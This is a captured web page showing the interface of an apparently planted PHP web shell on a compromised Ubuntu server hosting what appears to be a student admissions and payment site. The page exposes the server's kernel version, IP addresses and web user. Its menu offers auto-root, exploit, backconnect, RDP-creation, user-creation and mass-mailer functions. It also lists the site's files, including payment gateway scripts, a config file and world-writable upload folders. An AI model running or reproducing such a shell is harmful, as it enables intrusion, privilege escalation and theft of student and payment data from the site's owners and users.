Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.142.98.186
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde_tobedeleted /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
Reports
[ DIR ]
drwxr-xr-x
adm_admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
documentation
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
42.46
KB
-rwxr-xr-x
MainPage.js
40.53
KB
-rwxr-xr-x
MainPage_2.html
34.17
KB
-rwxr-xr-x
Notification.pdf
1.24
MB
-rwxr-xr-x
Registrationpage.html
6.5
KB
-rwxr-xr-x
Reprint.html
7.53
KB
-rwxr-xr-x
Thumbs.db
3
KB
-rwxr-xr-x
admAppForm.html
9.88
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
appForm.html
16.39
KB
-rwxr-xr-x
appStatus2.html
12.3
KB
-rwxr-xr-x
cconfig.php
1.23
KB
-rwxr-xr-x
challan.html
8.38
KB
-rwxr-xr-x
chkResponse.php
434
B
-rwxr-xr-x
favicon.ico
1.83
KB
-rwxr-xr-x
h1.css
2.4
KB
-rwxr-xr-x
h1.html
5
KB
-rwxr-xr-x
h1.js
808
B
-rwxr-xr-x
homepage.html
8.52
KB
-rwxr-xr-x
index.html
10.01
KB
-rwxr-xr-x
index1.html
2.88
KB
-rwxr-xr-x
index2.html
5.09
KB
-rwxr-xr-x
index_15022018.html
10.01
KB
-rwxr-xr-x
lateral.pdf
401.08
KB
-rwxr-xr-x
logo.png
588.37
KB
-rwxr-xr-x
menubar.html
6.37
KB
-rwxr-xr-x
payment_gateway.php
7.78
KB
-rwxr-xr-x
paymentresponce.php
10.12
KB
-rwxr-xr-x
pgResponse.php
10.01
KB
-rwxr-xr-x
pgResponse22.php
9.59
KB
-rwxr-xr-x
pgResponse_.php
10.71
KB
-rwxr-xr-x
readmission.html
6.53
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : h1.html
<div class="container"> <div class="row"> <section> <div class="wizard"> <div class="wizard-inner"> <div class="connecting-line"></div> <ul class="nav nav-tabs" role="tablist"> <li role="presentation" class="active"> <a href="#step1" data-toggle="tab" aria-controls="step1" role="tab" title="Step 1"> <span class="round-tab"> <i class="glyphicon glyphicon-folder-open"></i> </span> </a> </li> <li role="presentation" class="disabled"> <a href="#step2" data-toggle="tab" aria-controls="step2" role="tab" title="Step 2"> <span class="round-tab"> <i class="glyphicon glyphicon-pencil"></i> </span> </a> </li> <li role="presentation" class="disabled"> <a href="#step3" data-toggle="tab" aria-controls="step3" role="tab" title="Step 3"> <span class="round-tab"> <i class="glyphicon glyphicon-picture"></i> </span> </a> </li> <li role="presentation" class="disabled"> <a href="#complete" data-toggle="tab" aria-controls="complete" role="tab" title="Complete"> <span class="round-tab"> <i class="glyphicon glyphicon-ok"></i> </span> </a> </li> </ul> </div> <form role="form"> <div class="tab-content"> <div class="tab-pane active" role="tabpanel" id="step1"> <h3>Step 1</h3> <div class="row clearfix"> <div class="col-md-4"> <b>Full Name</b> <div class="form-group"> <div class="form-line"> <input type="text" id = 'T1' class="form-control" placeholder="Full Name"> </div> </div> </div> </div> <ul class="list-inline pull-right"> <li><button type="button" onclick = "arun()" class="btn btn-primary next-step">Save and continue</button></li> </ul> </div> <div class="tab-pane" role="tabpanel" id="step2"> <h3>Step 2</h3> <div class="row clearfix"> <div class="col-md-4"> <b>Full Name</b> <div class="form-group"> <div class="form-line"> <input type="text" id = 'T2' class="form-control" placeholder="Full Name"> </div> </div> </div> </div> <ul class="list-inline pull-right"> <li><button type="button" class="btn btn-default prev-step">Previous</button></li> <li><button type="button" onclick="arun2()" class="btn btn-primary next-step">Save and continue</button></li> </ul> </div> <div class="tab-pane" role="tabpanel" id="step3"> <h3>Step 3</h3> <p>This is step 3</p> <ul class="list-inline pull-right"> <li><button type="button" class="btn btn-default prev-step">Previous</button></li> <li><button type="button" class="btn btn-default next-step">Skip</button></li> <li><button type="button" class="btn btn-primary btn-info-full next-step">Save and continue</button></li> </ul> </div> <div class="tab-pane" role="tabpanel" id="complete"> <h3>Complete</h3> <p>You have successfully completed all steps.</p> </div> <div class="clearfix"></div> </div> </form> </div> </section> </div> </div> <link href="h1.css" rel="stylesheet" /> <script src="h1.js"></script> <script type="text/javascript"> function arun() { alert($('#T1').val()); } function arun2() { alert($('#T2').val()); } </script>
Close